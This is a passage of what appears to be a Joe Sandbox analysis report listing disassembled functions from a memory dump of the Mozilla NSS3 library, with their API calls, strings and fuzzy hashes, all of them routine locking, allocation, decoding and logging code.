API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID: @uU~/
API String ID: 3748922049-2989128320
Opcode ID: 530eadc22232cc88fab1f93f580b65dab645914cb002b6c322f580789640d8ad
Instruction ID: b907b21519fcdb6102909a3c7a0a64c5d0c5bb76dbf2545f05c4e1ab710ec098
Opcode Fuzzy Hash: 530eadc22232cc88fab1f93f580b65dab645914cb002b6c322f580789640d8ad
Instruction Fuzzy Hash: 865182B6A00105DBEF10DF69EC40BAA77F4AF48394F950425D95AA7351EB31ED01CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 68D44860 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D44894

Part of subcall function 68D8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,68E618D0,?), ref: 68D8B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D448CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D448DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 68D448FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 68D44912
PR_SetError.NSS3(FFFFE005,00000000), ref: 68D4494A

Part of subcall function 68DDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 68DDC2BF

Strings

@uU~/, xrefs: 68D44872

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID: @uU~/
API String ID: 759476665-2989128320
Opcode ID: f60a5ca7bb0fdc7790d1229be92577ca5c6a62020870f0c5897c00494638ac57
Instruction ID: 988c093e2cc8d9b8165ec9de63ee59fc58dbb9952cf1b44393d76de6556bc657
Opcode Fuzzy Hash: f60a5ca7bb0fdc7790d1229be92577ca5c6a62020870f0c5897c00494638ac57
Instruction Fuzzy Hash: 8841E4B5606305EBE720CF68D880B6B73E99F45398F80052CFA65A7281FB70D945CB72

Uniqueness

Uniqueness Score: -1.00%

Function 68D48CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,68D5124D,00000001), ref: 68D48D19
EnterCriticalSection.KERNEL32(?,?,?,?,68D5124D,00000001), ref: 68D48D32
PL_ArenaRelease.NSS3(?,?,?,?,?,68D5124D,00000001), ref: 68D48D73
PR_Unlock.NSS3(?,?,?,?,?,68D5124D,00000001), ref: 68D48D8C

Part of subcall function 68DDDD70: TlsGetValue.KERNEL32 ref: 68DDDD8C
Part of subcall function 68DDDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 68DDDDB4

PR_Unlock.NSS3(?,?,?,?,?,68D5124D,00000001), ref: 68D48DBA

Strings

KRAM, xrefs: 68D48D3E
KRAM, xrefs: 68D48CF9

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 53a3c9b005709c3504a1fd0c28247d5982a138fd1e24129d37f56da80764d2c9
Instruction ID: 9d5adf0ba5b01767de761a751021d2e8fa05fa4e816d0516c34538a0eeef4e98
Opcode Fuzzy Hash: 53a3c9b005709c3504a1fd0c28247d5982a138fd1e24129d37f56da80764d2c9
Instruction Fuzzy Hash: A8215AB5A44601CFCB40AF78C48466EB7F0FF46394F458969D9A987701EB35D882CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68E40860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E4086C

Part of subcall function 68E40930: EnterCriticalSection.KERNEL32(?,00000000,?,68E40C83), ref: 68E4094F
Part of subcall function 68E40930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,68E40C83), ref: 68E40974
Part of subcall function 68E40930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40983
Part of subcall function 68E40930: _PR_MD_UNLOCK.NSS3(?,?,68E40C83), ref: 68E4099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E4087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E40892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,68E4798A), ref: 68E408AA
free.MOZGLUE(?,00000000,00000000,?,?,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E408C7
free.MOZGLUE(?,00000000,00000000,?,?,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E408E9
free.MOZGLUE(?,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E408EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,68E47AE2,?,?,?,?,?,?,68E4798A), ref: 68E4090E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: c46e4a4a18853e29e3939cbba1ed5f282eacb3f5b43aa6e7127d9ea567dfd2f6
Instruction ID: c8f5725ac61829bd7178ba189b9aea0acc5385759db99e1c451a46d00d8e56e3
Opcode Fuzzy Hash: c46e4a4a18853e29e3939cbba1ed5f282eacb3f5b43aa6e7127d9ea567dfd2f6
Instruction Fuzzy Hash: B01193F2E412005BEF419B98E98574E37ACAB57218F590135E83A87342D6B9E4168BD2

Uniqueness

Uniqueness Score: -1.00%

Function 68D4C9E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 68D4CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 68D4CA35
PR_Unlock.NSS3(00000000), ref: 68D4CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 68D4CA77
PR_Unlock.NSS3(00000000), ref: 68D4CAFC

Strings

@uU~/, xrefs: 68D4C9EF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID: @uU~/
API String ID: 1974170392-2989128320
Opcode ID: 8520d2d949259da02e17d8f0c83719f828fcc0cf1ca9c38df0fae98bd8f43c6e
Instruction ID: d7866358313e3221ddc76c6b9a6851fce7b0c1a77cd0ca57a914f292ae322944
Opcode Fuzzy Hash: 8520d2d949259da02e17d8f0c83719f828fcc0cf1ca9c38df0fae98bd8f43c6e
Instruction Fuzzy Hash: 5E41DF79A00205DBEF00DF65D846A6F7BB4AF46394F844068ED29A7311EB30E916CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 68D58C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 68D58C7C

Part of subcall function 68DF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DC6
Part of subcall function 68DF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DD1
Part of subcall function 68DF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68DF9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68D58CB0
TlsGetValue.KERNEL32 ref: 68D58CD1
EnterCriticalSection.KERNEL32(?), ref: 68D58CE5
PR_Unlock.NSS3(?), ref: 68D58D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 68D58D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 68D58D93

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: ad78ca36f5fcefdbaf904df62b34799c40190fb94b8099ce9c5e14a213863692
Instruction ID: e3ded4620ab0520ff09f5c744174d015c0247fcd745fa1a5600a54ac126a6daa
Opcode Fuzzy Hash: ad78ca36f5fcefdbaf904df62b34799c40190fb94b8099ce9c5e14a213863692
Instruction Fuzzy Hash: 2D312575A40601EFEF00AF64DC447AAB7A4BF06394F900137EA29A7750D770A930CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 68D48C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 68D48C1B
EnterCriticalSection.KERNEL32 ref: 68D48C34
PL_ArenaAllocate.NSS3 ref: 68D48C65
PR_Unlock.NSS3 ref: 68D48C9C
PR_Unlock.NSS3 ref: 68D48CB6

Part of subcall function 68DDDD70: TlsGetValue.KERNEL32 ref: 68DDDD8C
Part of subcall function 68DDDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 68DDDDB4

Strings

KRAM, xrefs: 68D48C8F

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 4b83f9f8de63c4dce13a324ada69d153511ea031d2c7bfa7cb16fb17050645f0
Instruction ID: ac34e9bd90e8717ef9da3ba38fa24783cefbf3d35c79534e4153f03d6b1a21a5
Opcode Fuzzy Hash: 4b83f9f8de63c4dce13a324ada69d153511ea031d2c7bfa7cb16fb17050645f0
Instruction Fuzzy Hash: 80218DB5A44A01DFDB00AF78C484529BBF4FF46384F458969D8898B311EB34D886CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 68E0A800 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,68CD7915,?,?), ref: 68E0A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,68CD7915,?,?), ref: 68E0A8A6

Strings

%s at line %d of [%.10s], xrefs: 68E0A8A0
@uU~/, xrefs: 68E0A811
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 68E0A891
database corruption, xrefs: 68E0A89B

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$@uU~/$database corruption
API String ID: 912837312-2452616415
Opcode ID: 9be5f540b6c966c0da05c44d09eac4476c05d10cb04a8bc568739b668f2397db
Instruction ID: e83fb7b4fa26b62da28c6de8b966b9e8da89bf4735ab6a9b956cf5814e7f6806
Opcode Fuzzy Hash: 9be5f540b6c966c0da05c44d09eac4476c05d10cb04a8bc568739b668f2397db
Instruction Fuzzy Hash: 90112976A40208AFDB049F15EC45A6EB7A1FF49324FA0443DFC194B280EB34D962D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 68E42C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 68E42CA0
PR_ExitMonitor.NSS3 ref: 68E42CBE
calloc.MOZGLUE(00000001,00000014), ref: 68E42CD1
strdup.MOZGLUE(?), ref: 68E42CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 68E42D27

Strings

Loaded library %s (static lib), xrefs: 68E42D22

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: ac61b0415a4d6eb65827089beb5bd0b401ba037ce9e4b21be91292516107a4f7
Instruction ID: add752fe9054180032d0dfd818b012a3869b2ba470b8df79a73c240587d2c3b6
Opcode Fuzzy Hash: ac61b0415a4d6eb65827089beb5bd0b401ba037ce9e4b21be91292516107a4f7
Instruction Fuzzy Hash: AC11B9B6940200AFDF118F55F84062D7769AB5B35DFA4813ED82DC7341D7769806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68D368E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 68D368FB
EnterCriticalSection.KERNEL32 ref: 68D36913
PORT_FreeArena_Util.NSS3 ref: 68D3693E
PR_Unlock.NSS3 ref: 68D36946
DeleteCriticalSection.KERNEL32 ref: 68D36951
free.MOZGLUE ref: 68D3695D
PR_Unlock.NSS3 ref: 68D36968

Part of subcall function 68DDDD70: TlsGetValue.KERNEL32 ref: 68DDDD8C
Part of subcall function 68DDDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 68DDDDB4

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: d593df4ed3f230d0067784472983511e1301d1d8d3efdddc11f7d01e876d3a90
Instruction ID: c8b444517263c22288f40b942f73455a114d26669f48a33668f4be5769a5e28a
Opcode Fuzzy Hash: d593df4ed3f230d0067784472983511e1301d1d8d3efdddc11f7d01e876d3a90
Instruction Fuzzy Hash: 08114CB5504725DFDB40AF78E48852DBBF4FF07294F414968D9999B201EB30D485CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D488D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,68D50725,00000000,00000058), ref: 68D48906
EnterCriticalSection.KERNEL32(?), ref: 68D4891A
PL_ArenaAllocate.NSS3(?,?), ref: 68D4894A
calloc.MOZGLUE(00000001,68D5072D,00000000,00000000,00000000,?,68D50725,00000000,00000058), ref: 68D48959
memset.VCRUNTIME140(?,00000000,?), ref: 68D48993
PR_Unlock.NSS3(?), ref: 68D489AF

Part of subcall function 68D207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207AD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207CD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207D6
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,68CB204A), ref: 68D207E4
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,68CB204A), ref: 68D20864
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,0000002C), ref: 68D20880
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,68CB204A), ref: 68D208CB
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208D7
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208FB

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 0dfda763da960a40ecf21f588f54e5cbd1a43587a9d530bc19f1cec788f2285c
Instruction ID: 6aaaf50f22e208e96b70abd9418ad7eb548295d9fd9c1c5d4b3bb3a67bf13cdd
Opcode Fuzzy Hash: 0dfda763da960a40ecf21f588f54e5cbd1a43587a9d530bc19f1cec788f2285c
Instruction Fuzzy Hash: BF31D5B6E80615ABDB009F28DC41A5977A4BF067D8F498624EC6CD7241E731E843C7F2

Uniqueness

Uniqueness Score: -1.00%

Function 68D84820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,68D84EB8,?), ref: 68D84884

Part of subcall function 68D88800: TlsGetValue.KERNEL32(?,68D9085A,00000000,?,68D38369,?), ref: 68D88821
Part of subcall function 68D88800: TlsGetValue.KERNEL32(?,?,68D9085A,00000000,?,68D38369,?), ref: 68D8883D
Part of subcall function 68D88800: EnterCriticalSection.KERNEL32(?,?,?,68D9085A,00000000,?,68D38369,?), ref: 68D88856
Part of subcall function 68D88800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 68D88887
Part of subcall function 68D88800: PR_Unlock.NSS3(?,?,?,?,68D9085A,00000000,?,68D38369,?), ref: 68D88899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(68D84EB8,?,?,?,?,?,?,?,?,?,?,68D478F8), ref: 68D8484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(68D84EB8,?,?,?,?,?,?,?,?,?,?,68D478F8), ref: 68D8486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,68D478F8), ref: 68D84899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D848A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D848B8

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 504c2a3547f78037ce5d00519be67f86ddaf4f0281251df6d11aa4f5e9c06a3b
Instruction ID: 2f7e5e3f918328baabdc01008f5543be96ff4f1a45c8a7b9219a2d096a39e961
Opcode Fuzzy Hash: 504c2a3547f78037ce5d00519be67f86ddaf4f0281251df6d11aa4f5e9c06a3b
Instruction Fuzzy Hash: 7C21A7B6E00640EBEF209F65EC8092A777DAF1B7A5F840525DE5987202E721E81587B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D489E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,68D488AE,-00000008), ref: 68D48A04
EnterCriticalSection.KERNEL32(?), ref: 68D48A15
memset.VCRUNTIME140(68D488AE,00000000,00000132), ref: 68D48A27
PR_Unlock.NSS3(?), ref: 68D48A35
memset.VCRUNTIME140(68D488AE,00000000,00000132,00000000,-00000008,00000000,?,?,68D488AE,-00000008), ref: 68D48A45
free.MOZGLUE(68D488A6,?,68D488AE,-00000008), ref: 68D48A4E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 953cff51b6a951cd8105a3f08e5edb6182b075a4f8bcd0f5508dbf9f3d9684cf
Instruction ID: 524a8f8611adbb378620edd35e0c1bceb276ca71fa2dd22f84c15a049d6fdf2b
Opcode Fuzzy Hash: 953cff51b6a951cd8105a3f08e5edb6182b075a4f8bcd0f5508dbf9f3d9684cf
Instruction Fuzzy Hash: 241126B6E40201ABEB009F69EC85A2EB778FF06394F440525ED19A6201E7B1D55287F1

Uniqueness

Uniqueness Score: -1.00%

Function 68DC6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,68DCAA9B,?,?,?,?,?,?,?,00000000,?,68DC80C1), ref: 68DC6846

Part of subcall function 68D21770: calloc.MOZGLUE(00000001,0000019C,?,68D215C2,?,?,?,?,?,00000001,00000040), ref: 68D2178D

